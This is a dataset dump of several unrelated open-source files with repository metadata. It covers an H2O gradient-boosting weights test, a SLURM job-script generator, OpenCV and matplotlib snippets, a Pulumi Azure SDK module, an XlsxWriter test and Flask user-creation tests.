def weights_var_imp(ip,port):
# Connect to h2o
h2o.init(ip,port)
def check_same(data1, data2, min_rows_scale):
gbm1_regression = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy"],
min_rows=5,
ntrees=5,
max_depth=2)
gbm2_regression = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy"],
training_frame=data2,
min_rows=5*min_rows_scale,
weights_column="weights",
ntrees=5,
max_depth=2)
gbm1_binomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["economy_20mpg"],
min_rows=5,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm2_binomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["economy_20mpg"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="bernoulli",
ntrees=5,
max_depth=2)
gbm1_multinomial = h2o.gbm(x=data1[["displacement", "power", "weight", "acceleration", "year"]],
y=data1["cylinders"],
min_rows=5,
distribution="multinomial",
ntrees=5,
max_depth=2)
gbm2_multinomial = h2o.gbm(x=data2[["displacement", "power", "weight", "acceleration", "year"]],
y=data2["cylinders"],
training_frame=data2,
weights_column="weights",
min_rows=5*min_rows_scale,
distribution="multinomial",
ntrees=5,
max_depth=2)
reg1_vi = gbm1_regression.varimp(return_list=True)
reg2_vi = gbm2_regression.varimp(return_list=True)
bin1_vi = gbm1_binomial.varimp(return_list=True)
bin2_vi = gbm2_binomial.varimp(return_list=True)
mul1_vi = gbm1_multinomial.varimp(return_list=True)
mul2_vi = gbm2_multinomial.varimp(return_list=True)
print "Varimp (regresson) no weights vs. weights: {0}, {1}".format(reg1_vi, reg2_vi)
print "Varimp (binomial) no weights vs. weights: {0}, {1}".format(bin1_vi, bin2_vi)
print "Varimp (multinomial) no weights vs. weights: {0}, {1}".format(mul1_vi, mul2_vi)
for rvi1, rvi2 in zip(reg1_vi, reg2_vi): assert rvi1 == rvi1, "Expected vi's (regression) to be the same, but got {0}, and {1}".format(rvi1, rvi2)
for bvi1, bvi2 in zip(bin1_vi, bin2_vi): assert bvi1 == bvi1, "Expected vi's (binomial) to be the same, but got {0}, and {1}".format(bvi1, bvi2)
for mvi1, mvi2 in zip(mul1_vi, mul2_vi): assert mvi1 == mvi1, "Expected vi's (multinomial) to be the same, but got {0}, and {1}".format(mvi1, mvi2)
h2o_cars_data = h2o.import_frame(h2o.locate("smalldata/junit/cars_20mpg.csv"))
h2o_cars_data["economy_20mpg"] = h2o_cars_data["economy_20mpg"].asfactor()
h2o_cars_data["cylinders"] = h2o_cars_data["cylinders"].asfactor()
# uniform weights same as no weights
weight = random.randint(1,10)
uniform_weights = [[weight] for r in range(406)]
h2o_uniform_weights = h2o.H2OFrame(python_obj=uniform_weights)
h2o_uniform_weights.setNames(["weights"])
h2o_data_uniform_weights = h2o_cars_data.cbind(h2o_uniform_weights)
print "\n\nChecking that using uniform weights is equivalent to no weights:"
check_same(h2o_cars_data, h2o_data_uniform_weights, weight)
# zero weights same as removed observations
zero_weights = [[0] if random.randint(0,1) else [1] for r in range(406)]
h2o_zero_weights = h2o.H2OFrame(python_obj=zero_weights)
h2o_zero_weights.setNames(["weights"])
h2o_data_zero_weights = h2o_cars_data.cbind(h2o_zero_weights)
h2o_data_zeros_removed = h2o_cars_data[h2o_zero_weights["weights"] == 1]
print "\n\nChecking that using some zero weights is equivalent to removing those observations:"
check_same(h2o_data_zeros_removed, h2o_data_zero_weights, 1)
# doubled weights same as doubled observations
doubled_weights = [[1] if random.randint(0,1) else [2] for r in range(406)]
h2o_doubled_weights = h2o.H2OFrame(python_obj=doubled_weights)
h2o_doubled_weights.setNames(["weights"])
h2o_data_doubled_weights = h2o_cars_data.cbind(h2o_doubled_weights)
doubled_data = h2o.as_list(h2o_cars_data, use_pandas=False)
colnames = doubled_data.pop(0)
for idx, w in enumerate(doubled_weights):
if w[0] == 2: doubled_data.append(doubled_data[idx])
h2o_data_doubled = h2o.H2OFrame(python_obj=doubled_data)
h2o_data_doubled.setNames(colnames)
h2o_data_doubled["economy_20mpg"] = h2o_data_doubled["economy_20mpg"].asfactor()
h2o_data_doubled["cylinders"] = h2o_data_doubled["cylinders"].asfactor()
h2o_data_doubled_weights["economy_20mpg"] = h2o_data_doubled_weights["economy_20mpg"].asfactor()
h2o_data_doubled_weights["cylinders"] = h2o_data_doubled_weights["cylinders"].asfactor()
print "\n\nChecking that doubling some weights is equivalent to doubling those observations:"
check_same(h2o_data_doubled, h2o_data_doubled_weights, 1)
if __name__ == "__main__":
h2o.run_test(sys.argv, weights_var_imp)
|
[
"eric.eckstrand@gmail.com"
] |
eric.eckstrand@gmail.com
|
5a792baad7875ecfd9cb09eb33eff687dbab1295
|
1699300e1225f0994fbfd5e13a7eb4436a5df14d
|
/03_SC_Track/02_Original_V_624_Joho/Make_SLURM_submission_script.py
|
6ff6b2d5f59e75247f2e258efde560ac32922702
|
[
"MIT"
] |
permissive
|
HaroonRafique/PyORBIT_MD4224
|
26307a60ed79f3e170fbd655eb8cbe8cc9a0dfa9
|
6f68a80b2f8bf1cbeb9e2fc840925efe8a8b5672
|
refs/heads/master
| 2023-04-25T13:27:49.756836
| 2020-08-25T10:26:07
| 2020-08-25T10:26:07
| 215,249,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,313
|
py
|
#!/usr/bin/env python
# Python script to create a SLURM submission script for PyORBIT
# 21 March 2019 Haroon Rafique CERN BE-ABP-HSI
import os
#-----------------------------------------------------------------------
# SETTINGS
#-----------------------------------------------------------------------
script_name = "SLURM_submission_script.sh"
# Switches
hyperthreading = False # Enable hyperthreading
exclusive = True # Exclusive (see SLURM documentation)
autotime = True # 2 days for short queues, 2 weeks for long queues
autotask = True # Automatically set nodes to maximum tasks
clean_all = True # Clean simulation folder before running (False when resuming pickle checkpoint)
# Must be chosen
# ~ queue = 'inf-long', 'inf-short', 'batch-long', 'batch-short'
queue = 'batch-short'
n_nodes = 2
jobname = '03_02'
path_to_simulation = os.path.dirname(os.path.realpath(__file__)) # This directory
# Optional - have to use with correct switches
manual_time = '504:00:00' # manually set using format 'hours:minutes:seconds'
manual_tasks = 40 # manually change ntasks
# Defaults - can be changed
output_file_name = 'slurm.%N.%j.out'
error_file_name = 'slurm.%N.%j.err'
root_dir = '/hpcscratch/user/harafiqu'
simulation_file = 'pyOrbit.py'
#-----------------------------------------------------------------------
# AUTOMATICALLY FORMAT SCRIPT
#-----------------------------------------------------------------------
n_tasks = 0
if autotask:
if hyperthreading:
if 'batch' in queue: n_tasks = 32
elif 'inf' in queue: n_tasks = 40
else:
print 'queue not recognised'
exit(0)
else:
if 'batch' in queue: n_tasks = 16
elif 'inf' in queue: n_tasks = 20
else:
print 'queue not recognised'
exit(0)
else: n_tasks = manual_tasks
time = '48:00:00'
if autotime:
if queue == 'batch-short': time = '48:00:00'
elif queue == 'inf-short': time = '120:00:00'
elif queue == 'inf-long' or 'batch-long': time = '504:00:00'
else:
print 'queue not recognised'
exit(0)
else: time = manual_time
#-----------------------------------------------------------------------
# WRITE FILE
#-----------------------------------------------------------------------
if os.path.exists(script_name):
print 'SLURM submission script ' + script_name + ' already exists. Deleting'
os.remove(script_name)
print "Creating ", script_name
f= open(script_name,"w")
f.write('#!/bin/bash')
f.write('\n#SBATCH --job-name=' + str(jobname))
f.write('\n#SBATCH --output=' + str(output_file_name))
f.write('\n#SBATCH --error=' + str(error_file_name))
f.write('\n#SBATCH --nodes=' + str(n_nodes))
f.write('\n#SBATCH --ntasks-per-node=' + str(n_tasks))
f.write('\n#SBATCH --partition=' + str(queue))
f.write('\n#SBATCH --time=' + str(time))
f.write('\n#SBATCH --mem-per-cpu=3200M')
if (exclusive): f.write('\n#SBATCH --exclusive')
if not hyperthreading: f.write('\n#SBATCH --hint=nomultithread')
f.write('\n')
f.write('\nBATCH_ROOT_DIR=' + str(root_dir))
f.write('\nRUN_DIR=' + str(path_to_simulation))
f.write('\nOrigIwd=$(pwd)')
f.write('\n')
f.write('\n# Make an output folder in the root directory to hold SLURM info file')
f.write('\ncd ${BATCH_ROOT_DIR}')
f.write('\noutput_dir="output"')
f.write('\nmkdir -p $output_dir')
f.write('\n')
f.write('\n# Fill the SLURM info file')
f.write('\nsimulation_info_file="${BATCH_ROOT_DIR}/${output_dir}/simulation_info_${SLURM_JOB_ID}.${SLURM_NODEID}.${SLURM_PROCID}.txt"')
f.write('\necho "PyOrbit path: `readlink -f ${ORBIT_ROOT}`" >> ${simulation_info_file}')
f.write('\necho "Run path: `readlink -f ${RUN_DIR}`" >> ${simulation_info_file}')
f.write('\necho "Submit host: `readlink -f ${SLURM_SUBMIT_HOST}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job name: `readlink -f ${SLURM_JOB_NAME}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Job ID: `readlink -f ${SLURM_JOB_ID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Nodes allocated: `readlink -f ${SLURM_JOB_NUM_NODES}`" >> ${simulation_info_file}')
f.write('\necho "SLURM CPUS per Node: `readlink -f ${SLURM_CPUS_ON_NODE}`" >> ${simulation_info_file}')
f.write('\necho "SLURM Node ID: `readlink -f ${SLURM_NODEID}`" >> ${simulation_info_file}')
f.write('\necho "SLURM total cores for job: `readlink -f ${SLURM_NTASKS}`" >> ${simulation_info_file}')
f.write('\necho "SLURM process ID: `readlink -f ${SLURM_PROCID}`" >> ${simulation_info_file}')
f.write('\necho "****************************************" >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Enter job directory, clean it, and setup environment -> SLURM info file')
f.write('\ncd ${RUN_DIR}')
if clean_all:f.write('\n./clean_all.sh')
f.write('\n. setup_environment.sh >> ${simulation_info_file}')
f.write('\n')
f.write('\n# Load correct MPI')
f.write('\nmodule load mpi/mvapich2/2.3')
f.write('\n')
f.write('\ntstart=$(date +%s)')
f.write('\n')
f.write('\n# Run the job')
if hyperthreading:f.write('\nsrun ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
else:f.write('\nsrun --hint=nomultithread ${ORBIT_ROOT}/bin/pyORBIT ${RUN_DIR}/' + str(simulation_file))
f.write('\n')
f.write('\ntend=$(date +%s)')
f.write('\ndt=$(($tend - $tstart))')
f.write('\necho "total simulation time (s): " $dt >> ${simulation_info_file}')
f.close()
print 'SLURM submission script creation finished'
|
[
"haroon.rafique@protonmail.com"
] |
haroon.rafique@protonmail.com
|
1beabcb56dd1176bcf5845a34ee13550fc79898d
|
6a612dba404176b7e180dfb2791353701c82a3bf
|
/processors/backsubtractors.py
|
bce6b46663e1146affff7a04f9cff7a61ad6f29c
|
[] |
no_license
|
tulare/smile-in-the-light
|
d15a3e142974a055215b3eb9ac8dd1e5e57fdb1e
|
1250579f015fa4cb8c4593976e27579e5ed5515d
|
refs/heads/master
| 2020-05-27T07:57:29.617680
| 2019-06-26T10:31:39
| 2019-06-26T10:31:39
| 188,537,874
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 943
|
py
|
# -*- encoding: utf8 -*-
import cv2 as cv
import numpy as np
from .core import FrameProcessor
__all__ = [ 'BackgroundSubtractor' ]
# ------------------------------------------------------------------------------
OPENCV_BACKSUB_ALGOS = {
'MOG2' : cv.createBackgroundSubtractorMOG2,
'KNN' : cv.createBackgroundSubtractorKNN,
}
# ------------------------------------------------------------------------------
class BackSubProcessor(FrameProcessor) :
def params(self, **kwargs) :
algo = kwargs.get('algo', 'MOG2')
try :
self.backsub = OPENCV_BACKSUB_ALGOS[algo]()
except KeyError :
self.backsub = OPENCV_BACKSUB_ALGOS['KNN']()
def apply(self, frame, context) :
fgmask = self.backsub.apply(frame)
frame = cv.bitwise_and(frame, frame, mask=fgmask)
return frame
# ------------------------------------------------------------------------------
|
[
"tulare.paxgalactica@gmail.com"
] |
tulare.paxgalactica@gmail.com
|
8c4480388e7fa8726898f73420d2f3df40bbf8a5
|
d5f2723c879e28d1bfded4bea3c4d327a6d8c4e5
|
/03_Visualizing_Data/3_histogram.py
|
4ce05d1953f447a9609544f396aa265152f8f6a8
|
[
"Unlicense"
] |
permissive
|
ramalho/data-science-from-scratch
|
709adb2bbef280c10edad4bdc2eb3d2a997d5e79
|
46ead47912c4a0a945decdded1999a8a4cd67b57
|
refs/heads/master
| 2020-12-30T23:46:40.147841
| 2017-01-28T01:01:54
| 2017-01-28T01:01:54
| 80,624,463
| 2
| 0
| null | 2017-02-01T13:52:20
| 2017-02-01T13:52:20
| null |
UTF-8
|
Python
| false
| false
| 964
|
py
|
#!/usr/bin/env python3
"""Figure 3-3. Using a bar chart for a histogram"""
import matplotlib.pyplot as plt
from collections import Counter
def make_chart_histogram():
grades = [83,95,91,87,70,0,85,82,100,67,73,77,0]
decile = lambda grade: grade // 10 * 10
histogram = Counter(decile(grade) for grade in grades)
plt.bar([x - 4 for x in histogram.keys()], # shift each bar to the left by 4
histogram.values(), # give each bar its correct height
8) # give each bar a width of 8
plt.axis([-5, 105, 0, 5]) # x-axis from -5 to 105,
# y-axis from 0 to 5
plt.xticks([10 * i for i in range(11)]) # x-axis labels at 0, 10, ..., 100
plt.xlabel("Decile")
plt.ylabel("# of Students")
plt.title("Distribution of Exam 1 Grades")
plt.show()
if __name__ == "__main__":
make_chart_histogram()
|
[
"luciano@ramalho.org"
] |
luciano@ramalho.org
|
9096829dbf0ff0e9494f24cf8e1132798e9fa9fa
|
cf6a50732d708a3a3db0f297b73cb6f449a00b44
|
/Practice13_LoopingTechniques/Prac_13_13_change_code.py
|
9a157c3b996983c6bd0817e18f131585525f2a57
|
[] |
no_license
|
subash319/PythonDepth
|
9fe3920f4b0a25be02a9abbeeb60976853ab812e
|
0de840b7776009e8e4362d059af14afaac6a8879
|
refs/heads/master
| 2022-11-16T03:03:56.874422
| 2020-07-17T01:19:39
| 2020-07-17T01:19:39
| 266,921,459
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 568
|
py
|
# 13.
#
# data = [2,3,1,4,7,5]
# max_even = 0
# for item in data:
# if item%2==0 and item>max_even:
# max_even = item
# print(f'Largest even number is {max_even}')
# In this for loop, we are iterating over the items of a list and finding the largest even number.
#
# Make changes in this code so that you get the largest even number as well as its index.
data = [2,3,1,4,7,5]
max_even = 0
for index, item in enumerate(data):
if item%2==0 and item>max_even:
max_even = item
idx = index
print(f'Largest even number is {max_even} at index {idx}')
|
[
"subas319@gmail.com"
] |
subas319@gmail.com
|
d0093035d3098ebaa03f79ae3da3b4850586ba93
|
487ce91881032c1de16e35ed8bc187d6034205f7
|
/codes/CodeJamCrawler/16_0_1_neat/16_0_1_yordan_main.py
|
f1df87f60260bd9647255e67663f6aa609dbebc2
|
[] |
no_license
|
DaHuO/Supergraph
|
9cd26d8c5a081803015d93cf5f2674009e92ef7e
|
c88059dc66297af577ad2b8afa4e0ac0ad622915
|
refs/heads/master
| 2021-06-14T16:07:52.405091
| 2016-08-21T13:39:13
| 2016-08-21T13:39:13
| 49,829,508
| 2
| 0
| null | 2021-03-19T21:55:46
| 2016-01-17T18:23:00
|
Python
|
UTF-8
|
Python
| false
| false
| 884
|
py
|
#!/usr/bin/env python
import sys
def digits(x):
x = abs(x)
d = []
while x:
d.append(x % 10)
x //= 10
return d or [0]
def gen(x):
i = 1
while 1:
yield x * i
i += 1
def read_input(f):
N = int(f.readline())
inputs = []
for line in f:
inputs.append(int(line))
assert len(inputs) == N
return inputs
def solve(x):
if x == 0:
return 'INSOMNIA'
mask = 0x0
for y in gen(x):
for d in digits(y):
assert d <= 10
mask |= (1 << d)
if mask == 0b1111111111:
return y
return 'Damn...'
def main():
inputs = read_input(sys.stdin)
for i, x in enumerate(inputs, start=1):
# print('i={}, x={}'.format(i, digits(x)))
print('Case #{}: {}'.format(i, solve(x)))
if __name__ == '__main__':
main()
|
[
"[dhuo@tcd.ie]"
] |
[dhuo@tcd.ie]
|
5d4c4aa85a2d9cdec40ea80181cfef2bfb26c1ec
|
a6e4a6f0a73d24a6ba957277899adbd9b84bd594
|
/sdk/python/pulumi_azure_native/appconfiguration/get_private_endpoint_connection.py
|
f7cc2cd97bd2658bf9e3e438d054acac99b5aaaf
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
MisinformedDNA/pulumi-azure-native
|
9cbd75306e9c8f92abc25be3f73c113cb93865e9
|
de974fd984f7e98649951dbe80b4fc0603d03356
|
refs/heads/master
| 2023-03-24T22:02:03.842935
| 2021-03-08T21:16:19
| 2021-03-08T21:16:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,437
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetPrivateEndpointConnectionResult',
'AwaitableGetPrivateEndpointConnectionResult',
'get_private_endpoint_connection',
]
@pulumi.output_type
class GetPrivateEndpointConnectionResult:
"""
A private endpoint connection
"""
def __init__(__self__, id=None, name=None, private_endpoint=None, private_link_service_connection_state=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if private_endpoint and not isinstance(private_endpoint, dict):
raise TypeError("Expected argument 'private_endpoint' to be a dict")
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_link_service_connection_state and not isinstance(private_link_service_connection_state, dict):
raise TypeError("Expected argument 'private_link_service_connection_state' to be a dict")
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
The resource ID.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
"""
The resource of private endpoint.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> 'outputs.PrivateLinkServiceConnectionStateResponse':
"""
A collection of information about the state of the connection between service consumer and provider.
"""
return pulumi.get(self, "private_link_service_connection_state")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning status of the private endpoint connection.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetPrivateEndpointConnectionResult(GetPrivateEndpointConnectionResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPrivateEndpointConnectionResult(
id=self.id,
name=self.name,
private_endpoint=self.private_endpoint,
private_link_service_connection_state=self.private_link_service_connection_state,
provisioning_state=self.provisioning_state,
type=self.type)
def get_private_endpoint_connection(config_store_name: Optional[str] = None,
private_endpoint_connection_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPrivateEndpointConnectionResult:
"""
A private endpoint connection
API Version: 2020-06-01.
:param str config_store_name: The name of the configuration store.
:param str private_endpoint_connection_name: Private endpoint connection name
:param str resource_group_name: The name of the resource group to which the container registry belongs.
"""
__args__ = dict()
__args__['configStoreName'] = config_store_name
__args__['privateEndpointConnectionName'] = private_endpoint_connection_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:appconfiguration:getPrivateEndpointConnection', __args__, opts=opts, typ=GetPrivateEndpointConnectionResult).value
return AwaitableGetPrivateEndpointConnectionResult(
id=__ret__.id,
name=__ret__.name,
private_endpoint=__ret__.private_endpoint,
private_link_service_connection_state=__ret__.private_link_service_connection_state,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
|
[
"noreply@github.com"
] |
MisinformedDNA.noreply@github.com
|
f9b5b697037e33f9f12b027bc0b5b2c9630275de
|
18d223e5ea590e60bc791987034276eed2651721
|
/sk1-tt/lesson2-data-processing/c4-unsupervised-learning/c42_feature_agglomerative.py
|
51862d664f81bccb84812f300309511d5d5b2662
|
[] |
no_license
|
sonicfigo/tt-sklearn
|
83b419b4f8984fc63ef41bf2af5b682477350992
|
8e473e958b0afc6154ba3c4dee818fd4da8f504b
|
refs/heads/master
| 2020-03-26T16:07:59.758723
| 2018-09-25T06:28:47
| 2018-09-25T06:28:47
| 145,084,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,611
|
py
|
# coding=utf-8
"""
之前用过的lasso, 用到了 sparsity 技术,可以用来解决 curse of dimensionality 问题
另一种办法:feature agglomeration, 特征聚集(对feature聚类,注意区别直接对data聚类的阶层式聚类)
正常的聚类
是根据feature,对data聚类
feature agglomeration
是数据转置,对feature进行聚类
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import datasets, cluster
from sklearn.feature_extraction.image import grid_to_graph
digits = datasets.load_digits()
images = digits.images # 图片是 (1797, 8, 8)
X = np.reshape(images, (len(images), -1)) # (1797, 64)
connectivity = grid_to_graph(*images[0].shape) # (64, 64)
"""
开始特征聚类
"""
agglo = cluster.FeatureAgglomeration(connectivity=connectivity,
n_clusters=32)
agglo.fit(X)
"""
X (1797,64)
缩减到
X_reduced (1797, 32)
FeatureAgglomeration 实例的两个方法要关注:
1. transform
2. inverse_transform
"""
X_reduced = agglo.transform(X) # (1797, 32)
X_approx = agglo.inverse_transform(X_reduced) # (1797, 64)
images_approx = np.reshape(X_approx, images.shape) # (1797, 8, 8)
print(images_approx.shape)
IMG_INDEX = 23
plt.figure(1)
print(images[IMG_INDEX])
print(np.unique(images[IMG_INDEX]))
plt.imshow(images[IMG_INDEX])
print('\n===================肉眼看,原图像feature 64的,与压缩图像feature 32的,没什么区别啊')
plt.figure(2)
print(images_approx[IMG_INDEX])
print(np.unique(images_approx[IMG_INDEX]))
plt.imshow(images_approx[IMG_INDEX])
plt.show()
|
[
"sonic821113@gmail.com"
] |
sonic821113@gmail.com
|
5419f9bd1ab6510ad576878fcae58ddc84a24b7c
|
1a114943c92a5db40034470ff31a79bcf8ddfc37
|
/stdlib_exam/os-path-expandvars-example-1.py
|
b2b9b437176caf6eedbc4bca41e3855d1d665823
|
[] |
no_license
|
renwl/mylinux
|
1924918599efd6766c266231d66b2a7ed6f6cdd1
|
0602fc6d2b0d254a8503e57310f848fc3e1a73b4
|
refs/heads/master
| 2020-07-10T22:12:03.259349
| 2017-01-02T12:32:04
| 2017-01-02T12:32:04
| 66,467,007
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 167
|
py
|
import os
os.environ["USER"] = "user"
print os.path.expandvars("/home/$USER/config")
print os.path.expandvars("$USER/folders")
## /home/user/config
## user/folders
|
[
"wenliang.ren@quanray.com"
] |
wenliang.ren@quanray.com
|
f29d9ae762e6121f945faa8462bdcac0b729d598
|
9b422078f4ae22fe16610f2ebc54b8c7d905ccad
|
/xlsxwriter/test/vml/test_write_fill.py
|
27a23de9f742660fba4a29b9a6d8916f3102aaa4
|
[
"BSD-2-Clause-Views"
] |
permissive
|
projectsmahendra/XlsxWriter
|
73d8c73ea648a911deea63cb46b9069fb4116b60
|
9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45
|
refs/heads/master
| 2023-07-21T19:40:41.103336
| 2023-07-08T16:54:37
| 2023-07-08T16:54:37
| 353,636,960
| 0
| 0
|
NOASSERTION
| 2021-04-01T08:57:21
| 2021-04-01T08:57:20
| null |
UTF-8
|
Python
| false
| false
| 993
|
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...vml import Vml
class TestWriteVfill(unittest.TestCase):
"""
Test the Vml _write_fill() method.
"""
def setUp(self):
self.fh = StringIO()
self.vml = Vml()
self.vml._set_filehandle(self.fh)
def test_write_comment_fill(self):
"""Test the _write_comment_fill() method"""
self.vml._write_comment_fill()
exp = """<v:fill color2="#ffffe1"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_button_fill(self):
"""Test the _write_button_fill() method"""
self.vml._write_button_fill()
exp = """<v:fill color2="buttonFace [67]" o:detectmouseclick="t"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
|
[
"jmcnamara@cpan.org"
] |
jmcnamara@cpan.org
|
6b249119fe1fb273f634b04060a01fd3b1d39ab2
|
74091dce735f281188d38d2f00d1a68e1d38ff7a
|
/des_pattern/solid/open_closed_products.py
|
580caa39d9c24cf86d03055117d399a49d6ebe4b
|
[] |
no_license
|
nbiadrytski-zz/python-training
|
96741aa0ef37bda32d049fde5938191025fe2924
|
559a64aae2db51e11812cea5ff602f25953e8070
|
refs/heads/master
| 2023-05-07T04:08:23.898161
| 2019-12-10T12:12:59
| 2019-12-10T12:12:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,252
|
py
|
from enum import Enum
from abc import ABCMeta, abstractmethod
# Open Closed:
# A class should be open for extension (usually by inheritance), but closed for modification
# which means it's not a good idea to change smth that is already properly working,
# but it's better to extend the functionality in a new class
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
class Size(Enum):
SMALL = 1
MEDIUM = 2
LARGE = 3
class Product:
def __init__(self, name, color, size):
self.name = name
self.color = color
self.size = size
# Enterprise patterns: Specification (inheritance)
class Spec(metaclass=ABCMeta):
@abstractmethod
def is_satisfied(self, item):
"""Does an item satisfy the requirement?"""
pass
class Filter(metaclass=ABCMeta):
@abstractmethod
def filter(self, items, spec):
pass
class ColorSpec(Spec):
def __init__(self, color):
self.color = color
def is_satisfied(self, item):
return item.color == self.color
class SizeSpec(Spec):
def __init__(self, size):
self.size = size
def is_satisfied(self, item):
return item.size == self.size
class CombinedSpec(Spec):
def __init__(self, spec1, spec2):
self.spec2 = spec2
self.spec1 = spec1
def is_satisfied(self, item):
return self.spec1.is_satisfied(item) and self.spec2.is_satisfied(item)
class ProductFilter(Filter):
def filter(self, items, spec):
for item in items:
if spec.is_satisfied(item):
yield item
apple = Product('Apple', Color.GREEN, Size.SMALL)
tree = Product('Tree', Color.GREEN, Size.LARGE)
house = Product('House', Color.BLUE, Size.LARGE)
products = [apple, tree, house]
prod_filter = ProductFilter()
print('Green products:')
green = ColorSpec(Color.GREEN)
for p in prod_filter.filter(products, green):
print(f' - {p.name} is green')
print('Large products:')
large = SizeSpec(Size.LARGE)
for p in prod_filter.filter(products, large):
print(f' - {p.name} is large')
print('Large blue items:')
large_blue = CombinedSpec(large, ColorSpec(Color.BLUE))
for p in prod_filter.filter(products, large_blue):
print(f' - {p.name} is large and blue')
|
[
"Mikalai_Biadrytski@epam.com"
] |
Mikalai_Biadrytski@epam.com
|
a14bb37817d7bb4c8f4df5839311ba45d1fd581c
|
b30e399b7d687833126ebe4f5c8dd4ab49e2a5e7
|
/tests/test_create_user.py
|
3d1601cc2571d55b5034d477d3adc11f4ceda8fd
|
[] |
no_license
|
riquellopes/desafio-python
|
ccd43101403349e5103499a59136c2e00d67d9af
|
f512923b7f4b0fa6f092f31693d4480a241849aa
|
refs/heads/master
| 2021-01-17T17:16:28.486179
| 2016-10-10T12:40:22
| 2016-10-10T12:40:22
| 70,359,863
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,669
|
py
|
import json
def test_should_be_returned_a_valid_dict(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
data = {
"name": "João da Silva",
"email": "joao@silva.org",
"password": "hunter2",
"phones": [{"number": "987654321", "ddd": "21"}]
}
response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
assert response.status_code == 201
data = json.loads(response.data.decode('utf-8'))
assert "id" in data
assert "created" in data
assert "modified" in data
assert "last_login" in data
assert "token" in data
def test_should_be_returned_error_message(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
data = {
"name": "João da Silva",
"email": "joao@silva.org",
"password": "hunter2",
"phones": [{"number": "987654321", "ddd": "21"}]
}
response = test_client.post("/user", data=json.dumps(data), content_type='application/json')
assert response.status_code == 422
data = json.loads(response.data.decode('utf-8'))
assert data['mensagem'] == "E-mail já existente"
def test_should_be_get_error_message_when_no_data(test_client, mocker):
os = mocker.patch("app.models.os")
os.environ.get.return_value = "desafio_python"
response = test_client.post("/user", content_type='application/json')
assert response.status_code == 422
data = json.loads(response.data.decode('utf-8'))
assert data['mensagem'] == "Algumas informações não foram preenchidas."
|
[
"riquellopes@gmail.com"
] |
riquellopes@gmail.com
|
a95da837fce67b1869d7911c2f64fee0ab6ed7c8
|
ee8c4c954b7c1711899b6d2527bdb12b5c79c9be
|
/assessment2/amazon/run/core/controllers/file.py
|
61d9b400b2ea8cc711774fd99be3523dd691a551
|
[] |
no_license
|
sqlconsult/byte
|
02ac9899aebea4475614969b594bfe2992ffe29a
|
548f6cb5038e927b54adca29caf02c981fdcecfc
|
refs/heads/master
| 2021-01-25T14:45:42.120220
| 2018-08-11T23:45:31
| 2018-08-11T23:45:31
| 117,135,069
| 0
| 0
| null | null | null | null |
UTF-8
|
